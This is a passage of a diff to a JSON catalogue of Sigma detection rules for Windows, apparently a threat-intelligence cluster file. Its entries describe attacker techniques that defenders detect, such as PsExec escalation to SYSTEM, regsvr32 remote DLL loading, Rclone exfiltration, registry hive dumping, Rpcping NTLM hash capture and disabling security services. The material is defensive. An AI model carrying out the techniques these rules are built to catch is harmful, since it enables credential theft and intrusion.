- }, - { - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc_as_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "value": "PsExec Service Execution as LOCAL SYSTEM" - }, - { - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "meta": { - "author": "FLorian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc_renamed.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "value": "Renamed PsExec Service Execution" - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/11/23", - "falsepositive": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" - ], - "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", - "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/05/22", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" - ], - "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ] - }, - "uuid": "207b0396-3689-42d9-8399-4222658efc99", - "value": "PsExec/PAExec Flags" - }, - { - "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", - "meta": { - "author": "Nasreddine Bencherchali @nas_bench", - "creation_date": "2021/12/18", - "falsepositive": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" - ], - "filename": "proc_creation_win_susp_psloglist.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" - ] - }, - "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "value": "Suspicious Use of PsLogList" - }, - { - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", - "value": "Psr.exe Capture Screenshots" - }, - { - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "meta": { - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/01/09", - "falsepositive": [ - "Administrative scripts" - ], - "filename": "proc_creation_win_susp_ps_appdata.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", - "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", - "value": "PowerShell Script Run in AppData" - }, - { - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/08/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ps_downloadfile.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" - ] - }, - "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "value": "PowerShell DownloadFile" - }, - { - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/07/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "value": "Suspicious PowerShell Obfuscated PowerShell Code" - }, - { - "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", - "meta": { - "author": "frack113", - "creation_date": "2022/01/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_radmin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", - "https://www.radmin.fr/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ] - }, - "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "value": "Use Radmin Viewer Utility" - }, - { - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "meta": { - "author": "@ROxPinTeddy", - "creation_date": "2020/05/12", - "falsepositive": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" - ], - "filename": "proc_creation_win_susp_rar_flags.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://ss64.com/bash/rar.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", - "value": "Rar Usage with Password and Compression Level" - }, - { - "description": "Detects suspicious process related to rasdial.exe", - "meta": { - "author": "juju4", - "creation_date": "2019/01/16", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_rasdial_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/subTee/status/891298217907830785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "value": "Suspicious RASdial Activity" - }, - { - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "meta": { - "author": "Florian Roth, Maxime Thiebaut", - "creation_date": "2021/08/23", - "falsepositive": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" - ], - "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/j0nh4t/status/1429049506021138437", - "https://streamable.com/q2dsji", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1553" - ] - }, - "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "value": "Suspicious RazerInstaller Explorer Subprocess" - }, - { - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "meta": { - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", - "creation_date": "2021/05/10", - "falsepositive": [ - "Legitimate RClone use" - ], - "filename": "proc_creation_win_susp_rclone_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "value": "Rclone Execution via Command Line or PowerShell" - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ] - }, - "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "value": "Recon Information for Export with Command Prompt" - }, - { - "description": "Detects a set of suspicious network related commands often used in recon stages", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/07", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_recon_network_activity.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ] - }, - "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "value": "Network Reconnaissance Activity" - }, - { - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", - "value": "Regedit as Trusted Installer" - }, - { - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "meta": { - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_register_cimprovider.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/PhilipTsukerman/status/992021361106268161", - "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574" - ] - }, - "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", - "value": "DLL Execution Via Register-cimprovider.exe" - }, - { - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_registration_via_cscript.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", - "https://ss64.com/vb/cscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", - "value": "Suspicious Registration via cscript.exe" - }, - { - "description": "Detects various anomalies in relation to regsvr32.exe", - "meta": { - "author": "Florian Roth, oscd.community, Tim Shelton", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" - ] - }, - "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "value": "Regsvr32 Anomaly" - }, - { - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "value": "Regsvr32 Flags Anomaly" - }, - { - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "FQDNs that start with a number" - ], - "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", - "https://twitter.com/tccontre18/status/1480950986650832903", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "value": "Suspicious Regsvr32 HTTP IP Pattern" - }, - { - "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", - "meta": { - "author": "frack113", - "creation_date": "2021/11/29", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", - "value": "Suspicious Regsvr32 Execution With Image Extension" - }, - { - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" - ] - }, - "uuid": "50919691-7302-437f-8e10-1fe088afa145", - "value": "Regsvr32 Command Line Without DLL" - }, - { - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", - "value": "Suspicious Regsvr32 Execution From Remote Share" - }, - { - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "meta": { - "author": "elhoim", - "creation_date": "2022/05/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_regsvr32_spawn_explorer.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-april-2022/", - "https://www.echotrail.io/insights/search/regsvr32.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ] - }, - "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "value": "Regsvr32 Spawning Explorer" - }, - { - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/19", - "falsepositive": [ - "Rare legitimate add to registry via cli (to these locations)" - ], - "filename": "proc_creation_win_susp_reg_add.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" - ] - }, - "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "value": "Reg Add Suspicious Paths" - }, - { - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "meta": { - "author": "frack113", - "creation_date": "2021/11/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_reg_bitlocker.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadowcopy_deletion_via_powershell.yml" ], "tags": [ "attack.impact", - "attack.t1486" + "attack.t1490" ] }, - "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "value": "Suspicious Reg Add BitLocker" + "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" }, { - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", "meta": { - "author": "Florian Roth, John Lambert (idea), elhoim", - "creation_date": "2021/07/14", + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", "falsepositive": [ - "Unknown", - "Other security solution installers" + "Unlikely" ], - "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/1415295021041979392", - "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", - "https://vms.drweb.fr/virus/?i=24144899", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", - "value": "Reg Disable Security Service" - }, - { - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "meta": { - "author": "frack113", - "creation_date": "2021/12/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_reg_open_command.yml", + "filename": "proc_creation_win_susp_rpcping.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", + "https://twitter.com/vysecurity/status/974806438316072960", + "https://twitter.com/vysecurity/status/873181705024266241", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], "tags": [ "attack.credential_access", "attack.t1003" ] }, - "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "value": "Suspicious Reg Add Open Command" - }, - { - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_renamed_adfind.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ] - }, - "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "value": "Renamed AdFind Detection" + "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", + "value": "Capture Credentials with Rpcping.exe" }, { "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", @@ -52950,338 +42698,454 @@ "value": "Renamed CreateDump Process Dump" }, { - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/28", - "falsepositive": [ - "Unknown yet" - ], - "filename": "proc_creation_win_susp_renamed_dctask64.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" - ] - }, - "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "value": "Renamed ZOHO Dctask64" - }, - { - "description": "Detects suspicious renamed SysInternals DebugView execution", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_renamed_debugview.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.epicturla.com/blog/sysinturla", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ] - }, - "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "value": "Renamed SysInternals Debug View" - }, - { - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/22", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" - ], - "filename": "proc_creation_win_susp_renamed_paexec.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.poweradmin.com/paexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": 